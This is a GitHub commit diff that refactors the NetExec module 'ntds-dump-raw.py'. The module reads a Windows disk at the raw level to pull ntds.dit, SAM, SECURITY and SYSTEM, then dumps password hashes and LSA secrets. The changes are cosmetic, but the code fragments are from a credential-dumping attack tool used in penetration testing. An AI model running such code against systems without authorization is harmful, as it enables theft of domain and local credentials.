Skip to content

Commit fedca6b

Browse files
committed
Remove unnecessary function and formatting
1 parent 1d9b502 commit fedca6b

1 file changed

Lines changed: 35 additions & 29 deletions

File tree

nxc/modules/ntds-dump-raw.py

Lines changed: 35 additions & 29 deletions
Original file line numberDiff line numberDiff line change
@@ -83,25 +83,25 @@ def options(self, context, module_options):
8383
available_options = {
8484
"NTDS": "Windows/NTDS/ntds.dit",
8585
"LSA": "Windows/System32/config/SECURITY",
86-
"SAM": "Windows/System32/config/SAM"}
87-
selected_files_full_path = []
86+
"SAM": "Windows/System32/config/SAM"
87+
}
88+
self.files_full_location_to_extract = []
8889
if "TARGET" in module_options:
8990
selected_options = module_options["TARGET"].split(",")
9091
for option in selected_options:
9192
if option in available_options:
92-
selected_files_full_path.append(available_options[option])
93+
self.files_full_location_to_extract.append(available_options[option])
9394
else:
9495
context.log.error(f"Unknown option format: {option}")
9596
sys.exit(1)
9697
else:
97-
selected_files_full_path.append(available_options["NTDS"])
98-
selected_files_full_path.append(available_options["SAM"])
99-
self.add_files_path_to_extract(selected_files_full_path)
100-
101-
def add_files_path_to_extract(self, selected_files_full_path):
102-
"""Add the selected file paths for extraction and including SYSTEM by default"""
103-
selected_files_full_path.append("Windows/System32/config/SYSTEM")
104-
self.files_full_location_to_extract = selected_files_full_path
98+
self.files_full_location_to_extract.append(available_options["NTDS"])
99+
self.files_full_location_to_extract.append(available_options["SAM"])
100+
101+
# Add SYSTEM by default as needed for decryption
102+
self.files_full_location_to_extract.append("Windows/System32/config/SYSTEM")
103+
104+
# Prepare the files to extract
105105
self.files_to_extract = [c_filename.split("/")[-1] for c_filename in self.files_full_location_to_extract]
106106
self.number_of_file_to_extract = len(self.files_to_extract)
107107
self.extracted_files_location_local = dict.fromkeys(self.files_to_extract, "")
@@ -139,7 +139,7 @@ def main(self):
139139
first_section = self.read_from_disk(0, 1024)
140140
if len(first_section) == 0:
141141
self.logger.fail("Unable to read the Disk, try changing the --exec-method flag")
142-
if first_section[512 : 512 + 8] == b"EFI PART":
142+
if first_section[512: 512 + 8] == b"EFI PART":
143143
self.logger.display("Disk is formatted using GPT")
144144
NTFS_LOCATION = self.analyze_gpt("\\\\.\\PhysicalDrive0")
145145
if NTFS_LOCATION == -1:
@@ -149,10 +149,10 @@ def main(self):
149149
max_parition_size = 0
150150
NTFS_LOCATION = self.bytes_to_int_unsigned(first_section[0x1C6:0x1CA]) * self.SECTOR_SIZE
151151
for partition_indx in range(4):
152-
curr_partition_size = self.bytes_to_int_unsigned(first_section[0x1CA + (partition_indx * 0x10) : 0x1CE + (partition_indx * 0x10)])
152+
curr_partition_size = self.bytes_to_int_unsigned(first_section[0x1CA + (partition_indx * 0x10): 0x1CE + (partition_indx * 0x10)])
153153
if curr_partition_size > max_parition_size:
154154
max_parition_size = curr_partition_size
155-
NTFS_LOCATION = self.bytes_to_int_unsigned(first_section[0x1C6 + (partition_indx * 0x10) : 0x1CA + (partition_indx * 0x10)]) * self.SECTOR_SIZE
155+
NTFS_LOCATION = self.bytes_to_int_unsigned(first_section[0x1C6 + (partition_indx * 0x10): 0x1CA + (partition_indx * 0x10)]) * self.SECTOR_SIZE
156156

157157
self.logger.display(f"NTFS Location {hex(NTFS_LOCATION)}")
158158
self.NTFS_LOCATION = NTFS_LOCATION
@@ -180,7 +180,7 @@ def dump_hashes(self):
180180
local_operations = LocalOperations(self.extracted_files_location_local["SYSTEM"])
181181
boot_key = local_operations.getBootKey()
182182
no_lm_hash = local_operations.checkNoLMHashPolicy()
183-
183+
184184
# NTDS hashes
185185
if "ntds.dit" in self.extracted_files_location_local and self.extracted_files_location_local["ntds.dit"] != "":
186186
def add_ntds_hash(ntds_hash, host_id):
@@ -233,7 +233,7 @@ def add_ntds_hash(ntds_hash, host_id):
233233
NTDS.dump()
234234
except Exception as e:
235235
self.logger.fail(e)
236-
236+
237237
NTDS.finish()
238238

239239
# SAM hashes
@@ -281,7 +281,13 @@ def add_SAM_hash(SAM_hash, host_id):
281281

282282
# LSA
283283
if "SECURITY" in self.extracted_files_location_local and self.extracted_files_location_local["SECURITY"] != "":
284-
LSA = LSASecrets(self.extracted_files_location_local["SECURITY"], boot_key, None, isRemote=False, perSecretCallback=lambda secret_type, secret: self.logger.highlight(secret))
284+
LSA = LSASecrets(
285+
self.extracted_files_location_local["SECURITY"],
286+
boot_key,
287+
remoteOps=None,
288+
isRemote=False,
289+
perSecretCallback=lambda secret_type, secret: self.logger.highlight(secret)
290+
)
285291

286292
try:
287293
self.logger.success("LSA Secrets:")
@@ -300,7 +306,7 @@ def add_SAM_hash(SAM_hash, host_id):
300306

301307
def analyze_NTFS(self, ntfs_header):
302308
"""Decode the NTFS headers and extract needed infromation from it"""
303-
ntfs_header = ntfs_header[0xB : 0xB + 25 + 48]
309+
ntfs_header = ntfs_header[0xB: 0xB + 25 + 48]
304310
header_format = "<HBH3BHBHHHIIIQQQIB3BQI"
305311

306312
data = struct.unpack(header_format, ntfs_header)
@@ -348,7 +354,7 @@ def search_for_the_files(self, curr_data):
348354
"""Analyze the current MFT records and extract the targeted files if they are present"""
349355
MFT_record_indx = 0
350356
for curr_record_indx in range(len(curr_data) // 1024):
351-
curr_sector = curr_data[curr_record_indx * 1024 : curr_record_indx * 1024 + 1024]
357+
curr_sector = curr_data[curr_record_indx * 1024: curr_record_indx * 1024 + 1024]
352358
try:
353359
curr_MFA_sector_properties = self.analyze_MFT_header(curr_sector)
354360
if curr_MFA_sector_properties is None or curr_MFA_sector_properties.filename is None:
@@ -463,9 +469,9 @@ def decode_dataRun(self, dataRun):
463469
dataRun_len_nBytes = (dataRun[curr_datarun_indx] & 0b11110000) >> 4
464470
curr_datarun_indx += 1
465471

466-
dataRun_len = dataRun[curr_datarun_indx : curr_datarun_indx + dataRun_startingCluster_nBytes]
472+
dataRun_len = dataRun[curr_datarun_indx: curr_datarun_indx + dataRun_startingCluster_nBytes]
467473
dataRun_len = int.from_bytes(dataRun_len, byteorder="little", signed=False)
468-
datarun_startingCluster = dataRun[curr_datarun_indx + dataRun_startingCluster_nBytes : curr_datarun_indx + dataRun_startingCluster_nBytes + dataRun_len_nBytes]
474+
datarun_startingCluster = dataRun[curr_datarun_indx + dataRun_startingCluster_nBytes: curr_datarun_indx + dataRun_startingCluster_nBytes + dataRun_len_nBytes]
469475

470476
datarun_cluster_loc = int.from_bytes(datarun_startingCluster, byteorder="little", signed=True) + prev_datarun_loc
471477

@@ -483,12 +489,12 @@ def parse_MFT_header(self, curr_sector):
483489
parsed_header = {}
484490

485491
while True:
486-
curr_header = self.bytes_to_int_unsigned(curr_sector[curr_index : curr_index + 4])
492+
curr_header = self.bytes_to_int_unsigned(curr_sector[curr_index: curr_index + 4])
487493
if curr_header == 0xFFFFFFFF or curr_header is None:
488494
break
489495

490-
curr_header_len = self.bytes_to_int_unsigned(curr_sector[curr_index + 4 : curr_index + 4 + 4])
491-
parsed_header[self.ATTRIBUTE_NAMES[curr_header]] = curr_sector[curr_index : curr_index + curr_header_len]
496+
curr_header_len = self.bytes_to_int_unsigned(curr_sector[curr_index + 4: curr_index + 4 + 4])
497+
parsed_header[self.ATTRIBUTE_NAMES[curr_header]] = curr_sector[curr_index: curr_index + curr_header_len]
492498
curr_index = curr_index + curr_header_len
493499

494500
return parsed_header
@@ -505,13 +511,13 @@ def analyze_MFT_header(self, curr_sector):
505511
parsed_header = self.parse_MFT_header(curr_sector[Offset_to_the_first_attribute:])
506512

507513
if "$FILE_NAME" in parsed_header:
508-
filename_lenght = self.bytes_to_int_signed(parsed_header["$FILE_NAME"][0x58 : 0x58 + 1])
509-
curr_MFA_sector.parent_record_number = self.bytes_to_int_unsigned(parsed_header["$FILE_NAME"][0x18 : 0x18 + 3] + b"\x00")
514+
filename_lenght = self.bytes_to_int_signed(parsed_header["$FILE_NAME"][0x58: 0x58 + 1])
515+
curr_MFA_sector.parent_record_number = self.bytes_to_int_unsigned(parsed_header["$FILE_NAME"][0x18: 0x18 + 3] + b"\x00")
510516

511-
curr_MFA_sector.filename = parsed_header["$FILE_NAME"][0x58 + 2 : 0x58 + 2 + (filename_lenght * 2)].decode("utf-16")
517+
curr_MFA_sector.filename = parsed_header["$FILE_NAME"][0x58 + 2: 0x58 + 2 + (filename_lenght * 2)].decode("utf-16")
512518

513519
if "$DATA" in parsed_header:
514-
dataRun_offset = self.bytes_to_int_signed(parsed_header["$DATA"][0x20 : 0x20 + 1])
520+
dataRun_offset = self.bytes_to_int_signed(parsed_header["$DATA"][0x20: 0x20 + 1])
515521

516522
dataRun = parsed_header["$DATA"][dataRun_offset:]
517523
curr_MFA_sector.dataRun, curr_MFA_sector.size = self.decode_dataRun(dataRun)
@@ -550,7 +556,7 @@ def read_partition_entries(self, disk_path, partition_entry_lba, num_partition_e
550556

551557
for i in range(num_partition_entries):
552558
entry_offset = i * partition_entry_size
553-
partition_entry = partition_table_data[entry_offset : entry_offset + partition_entry_size]
559+
partition_entry = partition_table_data[entry_offset: entry_offset + partition_entry_size]
554560
partition_entries.append(partition_entry)
555561

556562
return partition_entries

0 commit comments

Comments
 (0)